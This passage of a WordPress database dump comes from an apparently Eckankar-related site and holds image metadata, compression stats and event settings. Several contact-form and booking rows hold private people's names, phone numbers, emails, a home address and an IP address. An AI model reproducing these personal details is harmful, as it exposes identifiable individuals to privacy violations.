Way-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18420;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1455574161\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(177870,268044,'_wp_attached_file','2023/02/Spiritual-Discussions.jpg'),(177871,268044,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:229;s:6:\"height\";i:153;s:4:\"file\";s:33:\"2023/02/Spiritual-Discussions.jpg\";s:8:\"filesize\";i:38768;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"Spiritual-Discussions-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32592;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:6:\"Picasa\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1397815346\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(177872,268042,'original-file','2023/02/ECK-Light-and-Sound-Service-updraft-pre-smush-original.jpg'),(177873,268042,'smush-complete','1'),(177874,268042,'smush-info','The file was compressed from 15.12 KB to 14.29 KB saving 5.48 percent using WP-Optimize'),(177875,268042,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:15487;s:12:\"smushed-size\";i:14638;s:15:\"savings-percent\";d:5.48;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:15487;s:10:\"compressed\";i:14638;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7834;s:10:\"compressed\";i:7768;}}}'),(177876,268043,'original-file','2023/02/Easy-Way-updraft-pre-smush-original.jpg'),(177877,268043,'smush-complete','1'),(177878,268043,'smush-info','The file was compressed from 36.31 KB to 25.24 KB saving 30.51 percent using WP-Optimize'),(177879,268043,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:37186;s:12:\"smushed-size\";i:25842;s:15:\"savings-percent\";d:30.51;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:37186;s:10:\"compressed\";i:25842;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:18420;s:10:\"compressed\";i:16282;}}}'),(177880,268044,'original-file','2023/02/Spiritual-Discussions-updraft-pre-smush-original.jpg'),(177881,268044,'smush-complete','1'),(177882,268044,'smush-info','The file was compressed from 37.86 KB to 23.57 KB saving 37.74 percent using WP-Optimize'),(177883,268044,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:38768;s:12:\"smushed-size\";i:24138;s:15:\"savings-percent\";d:37.74;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:38768;s:10:\"compressed\";i:24138;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:32592;s:10:\"compressed\";i:14967;}}}'),(177884,268041,'original-file','2023/02/Seminars-updraft-pre-smush-original.jpg'),(177885,268041,'smush-complete','1'),(177886,268041,'smush-info','The file was compressed from 63.71 KB to 20.63 KB saving 67.63 percent using WP-Optimize'),(177887,268041,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:65243;s:12:\"smushed-size\";i:21121;s:15:\"savings-percent\";d:67.63;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:65243;s:10:\"compressed\";i:21121;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:55452;s:10:\"compressed\";i:12749;}}}'),(177888,268048,'_wp_attached_file','2023/02/HI-Conf-Registration-Form-10-Feb-23.pdf'),(177889,268048,'_wp_attachment_metadata','a:2:{s:5:\"sizes\";a:4:{s:4:\"full\";a:5:{s:4:\"file\";s:43:\"HI-Conf-Registration-Form-10-Feb-23-pdf.jpg\";s:5:\"width\";i:1408;s:6:\"height\";i:1088;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71143;}s:6:\"medium\";a:5:{s:4:\"file\";s:51:\"HI-Conf-Registration-Form-10-Feb-23-pdf-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8280;}s:5:\"large\";a:5:{s:4:\"file\";s:52:\"HI-Conf-Registration-Form-10-Feb-23-pdf-1024x791.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:791;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41474;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:51:\"HI-Conf-Registration-Form-10-Feb-23-pdf-150x116.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5050;}}s:8:\"filesize\";i:736392;}'),(177890,268048,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2023/02/HI-Conf-Registration-Form-10-Feb-23.pdf - cannot be optimized, it has an invalid file type'),(177891,268048,'smush-complete',''),(177892,68102,'passster_area_shortcode',''),(177893,267919,'_oembed_17282f16a653c991eb4e3d6f9f01f652','<iframe title=\"Eckankar Youth: Just Sing HU! - Ancient Spiritual Exercise\" width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/wc9N_g2NolA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen></iframe>'),(177894,267919,'_oembed_time_17282f16a653c991eb4e3d6f9f01f652','1677093748'),(177896,268074,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1179;s:6:\"height\";i:435;s:4:\"file\";s:35:\"2023/02/waterfall-6-notxt-Final.jpg\";s:8:\"filesize\";i:102323;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"waterfall-6-notxt-Final-300x111.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8106;}s:5:\"large\";a:5:{s:4:\"file\";s:36:\"waterfall-6-notxt-Final-1024x378.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:378;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66400;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"waterfall-6-notxt-Final-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5411;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"waterfall-6-notxt-Final-768x283.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40728;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:35:\"waterfall-6-notxt-Final-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16592;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:35:\"waterfall-6-notxt-Final-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27870;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:35:\"waterfall-6-notxt-Final-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19716;}s:8:\"tileview\";a:5:{s:4:\"file\";s:35:\"waterfall-6-notxt-Final-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19881;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(177897,268074,'original-file','2023/02/waterfall-6-notxt-Final-updraft-pre-smush-original.jpg'),(177898,268074,'smush-complete','1'),(177899,268074,'smush-info','The file was compressed from 99.92 KB to 94.09 KB saving 5.84 percent using WP-Optimize'),(177900,268074,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:102323;s:12:\"smushed-size\";i:96345;s:15:\"savings-percent\";d:5.84;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:102323;s:10:\"compressed\";i:96345;}s:6:\"medium\";a:2:{s:8:\"original\";i:8106;s:10:\"compressed\";i:8040;}s:5:\"large\";a:2:{s:8:\"original\";i:66400;s:10:\"compressed\";i:63744;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5411;s:10:\"compressed\";i:5345;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:40728;s:10:\"compressed\";i:39253;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:16592;s:10:\"compressed\";i:16469;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:27870;s:10:\"compressed\";i:27240;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:19716;s:10:\"compressed\";i:19345;}s:8:\"tileview\";a:2:{s:8:\"original\";i:19881;s:10:\"compressed\";i:19807;}}}'),(177901,268076,'_field_362','Rebecca'),(177902,268076,'_field_363','Pierce'),(177903,268076,'_field_370','7077727535'),(177904,268076,'_field_364','rebecca.integrity@gmail.com'),(177905,268076,'_field_365','Location '),(177906,268076,'_field_366','Hi, I am coming to the Montrose area and would love to come meet in person. Where do you meet? I have been to the Santa Rosa CA location. \n\nThank you '),(177907,268076,'_form_id','39'),(177908,268076,'_seq_num','7'),(177909,268077,'_wp_attached_file','2023/02/2023-HI-overview-registration.pdf'),(177910,268077,'_wp_attachment_metadata','a:2:{s:5:\"sizes\";a:4:{s:4:\"full\";a:5:{s:4:\"file\";s:37:\"2023-HI-overview-registration-pdf.jpg\";s:5:\"width\";i:1088;s:6:\"height\";i:1408;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:251454;}s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"2023-HI-overview-registration-pdf-232x300.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20569;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"2023-HI-overview-registration-pdf-791x1024.jpg\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145706;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"2023-HI-overview-registration-pdf-116x150.jpg\";s:5:\"width\";i:116;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8293;}}s:8:\"filesize\";i:1100427;}'),(177941,268102,'_wp_attached_file','2023/02/favicon-gold-lg.png'),(177942,268102,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:27:\"2023/02/favicon-gold-lg.png\";s:8:\"filesize\";i:183872;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"favicon-gold-lg-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:66483;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"favicon-gold-lg-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23418;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:27:\"favicon-gold-lg-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:66483;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:27:\"favicon-gold-lg-474x324.png\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:105830;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:27:\"favicon-gold-lg-391x260.png\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:76273;}s:8:\"tileview\";a:5:{s:4:\"file\";s:27:\"favicon-gold-lg-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:90565;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(177981,268113,'mec_ticket_price_1','0'),(177982,268113,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"musickidd28@gmail.com\";s:4:\"name\";s:12:\"Micah Ingram\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"174.231.85.220\";}}'),(177983,268113,'mec_price','0'),(177984,268113,'mec_gateway','MEC_gateway_free'),(177985,268113,'mec_gateway_label','Free'),(177986,268114,'_field_496','Micah'),(177987,268114,'_field_497','Ingram'),(177988,268114,'_field_498','(720) 250-6041'),(177989,268114,'_field_499','musickidd28@gmail.com'),(177990,268114,'_field_500','7171 East Colfax Avenue Apt 512'),(177991,268114,'_field_501','Denver'),(177992,268114,'_field_502','CO'),(177993,268114,'_field_503','US'),(177994,268114,'_field_505','I recently ordered some materials and I wanted to just verify that I had put the correct mailing address down, with my apartment number included. '),(177995,268114,'_form_id','53'),(177996,268114,'_seq_num','8'),(177997,268115,'_field_450','Dawn'),(177998,268115,'_field_451','C'),(177999,268115,'_field_458','9706696100'),(178000,268115,'_field_452','d0c0lbd.s08147.us@samsclub.com'),(178001,268115,'_field_453','Discounted Sam’s Club Memberships'),(178002,268115,'_field_454','Hi there, I am the Sales &amp; Training Manager at Loveland Sam’s Club.  I was hoping to talk to someone about offering you all discounted memberships to our club.  New memberships as low as $25/yr.  If this sounds like something that you would want to share with your team, I can email out the QR codes to easily sign up from your home or office.  This offer is not available in the club.  It is special, just for local nonprofit partners.  Thank you for your consideration!'),(178003,268115,'_form_id','49'),(178004,268115,'_seq_num','11'),(178007,268118,'_wp_attached_file','2023/03/free-eck-books-lg-2.png'),(178008,268118,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:317;s:6:\"height\";i:260;s:4:\"file\";s:31:\"2023/03/free-eck-books-lg-2.png\";s:8:\"filesize\";i:61539;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"free-eck-books-lg-2-300x246.png\";s:5:\"width\";i:300;s:6:\"height\";i:246;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48806;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"free-eck-books-lg-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:21561;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:31:\"free-eck-books-lg-2-300x260.png\";s:5:\"width\";i:300;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:51054;}s:8:\"tileview\";a:5:{s:4:\"file\";s:31:\"free-eck-books-lg-2-300x260.png\";s:5:\"width\";i:300;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:51054;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(178009,268119,'_wp_attached_file','2023/03/free-eck-books-bk.jpg'),(178010,268119,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:631;s:6:\"height\";i:356;s:4:\"file\";s:29:\"2023/03/free-eck-books-bk.jpg\";s:8:\"filesize\";i:35554;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"free-eck-books-bk-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8011;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"free-eck-books-bk-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3844;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:29:\"free-eck-books-bk-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12350;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:29:\"free-eck-books-bk-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20015;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:29:\"free-eck-books-bk-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14035;}s:8:\"tileview\";a:5:{s:4:\"file\";s:29:\"free-eck-books-bk-300x356.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:356;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15190;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}');
INSERT INTO `wpcl_postmeta` VALUES (193888,269229,'_field_649',''),(193889,269229,'_form_id','61'),(193890,269229,'_seq_num','84'),(193891,269230,'_wp_attached_file','2023/10/tree-path-5.jpg'),(193892,269230,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:23:\"2023/10/tree-path-5.jpg\";s:8:\"filesize\";i:805906;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"tree-path-5-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29630;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"tree-path-5-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:216797;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"tree-path-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9368;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"tree-path-5-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126986;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:23:\"tree-path-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34427;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:23:\"tree-path-5-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88989;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:23:\"tree-path-5-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61646;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:23:\"tree-path-5-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41770;}s:8:\"tileview\";a:5:{s:4:\"file\";s:23:\"tree-path-5-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42144;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"tree-path-5-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:444778;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(193885,269229,'_field_653','lrharp@comcast.net'),(193884,269229,'_field_652','Harp'),(193883,269229,'_field_654','Linda '),(193862,269226,'_field_651','(303) 907-0059'),(193861,269226,'_field_653','renee4eck@hotmail.com'),(193860,269226,'_field_652','Wholey'),(178023,7160,'_oembed_bdcba8eb65c9d4bf21eda16bbbf4f6d0','<iframe title=\"Discover Eckankar and Advanced Spiritual Living\" width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/Vqi2UUMgpAM?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen></iframe>'),(178024,7160,'_oembed_time_bdcba8eb65c9d4bf21eda16bbbf4f6d0','1694538615'),(178025,79666,'passster_area_shortcode',''),(178026,268150,'mec_color',''),(178027,268150,'mec_location_id','122'),(178028,268150,'mec_dont_show_map','0'),(178029,268150,'mec_organizer_id','1'),(178030,268150,'mec_read_more',''),(178031,268150,'mec_more_info',''),(178032,268150,'mec_more_info_title',''),(178033,268150,'mec_more_info_target','_self'),(178034,268150,'mec_cost',''),(178035,268150,'mec_currency','a:0:{}'),(178036,268150,'mec_additional_organizer_ids','a:0:{}'),(178037,268150,'mec_additional_location_ids','a:0:{}'),(178038,268150,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-03-26\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-03-26\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(178039,268150,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(178040,268150,'mec_certain_weekdays','a:0:{}'),(178041,268150,'mec_allday','0'),(178042,268150,'one_occurrence','0'),(178043,268150,'mec_hide_time','0'),(178044,268150,'mec_hide_end_time','0'),(178045,268150,'mec_comment',''),(178046,268150,'mec_timezone','global'),(178047,268150,'mec_countdown_method','global'),(178048,268150,'mec_public','1'),(178049,268150,'mec_start_date','2023-03-26'),(178050,268150,'mec_start_time_hour','10'),(178051,268150,'mec_start_time_minutes','30'),(178052,268150,'mec_start_time_ampm','AM'),(178053,268150,'mec_start_day_seconds','37800'),(178054,268150,'mec_end_date','2023-03-26'),(178055,268150,'mec_end_time_hour','11'),(178056,268150,'mec_end_time_minutes','30'),(178057,268150,'mec_end_time_ampm','AM'),(178058,268150,'mec_end_day_seconds','41400'),(178059,268150,'mec_repeat_status','0'),(178060,268150,'mec_repeat_type',''),(178061,268150,'mec_repeat_interval','1'),(178062,268150,'mec_repeat_end',''),(178063,268150,'mec_repeat_end_at_occurrences',''),(178064,268150,'mec_repeat_end_at_date',''),(178065,268150,'mec_advanced_days','a:0:{}'),(178066,268150,'mec_in_days',''),(178067,268150,'mec_not_in_days',''),(178068,268150,'mec_hourly_schedules','a:0:{}'),(178069,268150,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(178070,268150,'mec_tickets','a:0:{}'),(178071,268150,'mec_fees_global_inheritance','1'),(178072,268150,'mec_fees','a:0:{}'),(178073,268150,'mec_ticket_variations_global_inheritance','1'),(178074,268150,'mec_ticket_variations','a:0:{}'),(178075,268150,'mec_reg_fields_global_inheritance','1'),(178076,268150,'mec_reg_fields','a:0:{}'),(178077,268150,'mec_bfixed_fields','a:0:{}'),(178078,268150,'mec_op','a:0:{}'),(178079,268150,'mec_fields','a:0:{}'),(178080,268150,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br 